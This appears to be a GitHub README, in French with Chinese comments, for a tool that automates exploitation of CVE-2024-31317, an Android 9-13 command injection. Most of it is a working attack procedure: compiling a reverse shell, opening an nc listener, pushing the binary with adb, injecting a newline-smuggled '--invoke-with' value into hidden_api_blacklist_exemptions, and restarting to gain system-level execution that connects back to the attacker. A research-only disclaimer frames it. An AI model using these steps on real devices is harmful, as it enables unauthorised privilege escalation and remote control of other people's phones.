
Outil de déploiement automatisé pour CVE-2024-31317, une vulnérabilité d'injection de commandes dans Android 9-13. Inclut une charge utile de shell inversé, un script de compilation et une analyse technique pour la recherche et l'éducation en sécurité.
Ce projet est destiné uniquement à la recherche en sécurité et à des fins éducatives. L'utilisation de cet outil pour des tests non autorisés est illégale. L'auteur décline toute responsabilité en cas d'abus ou de dommages.
CVE-2024-31317 est une vulnérabilité de sécurité critique affectant les appareils Android 9 à Android 13, permettant à une application disposant de la permission WRITE_SECURE_SETTINGS d'obtenir une exécution avec les privilèges système via une injection de commande.
Ce projet fournit une analyse technique détaillée de cette vulnérabilité, un code de preuve de concept (PoC) ainsi qu'un outil de déploiement automatisé.
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
chmod +x compile.sh
./compile.sh
# 启动监听器
nc -lvnp 4444
# 推送并执行
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# 注入payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# 触发漏洞
adb shell stop && adb shell start
Ce projet est destiné uniquement à la recherche en sécurité et à des fins éducatives. En utilisant cet outil, vous acceptez :
Ce projet est sous licence MIT - voir le fichier LICENSE
fcy10012 - GitHub
Projet de référence : WebLDix/CVE-2024-31317-PoC-Deployer
⭐ Si ce projet vous a été utile, merci de lui laisser une étoile !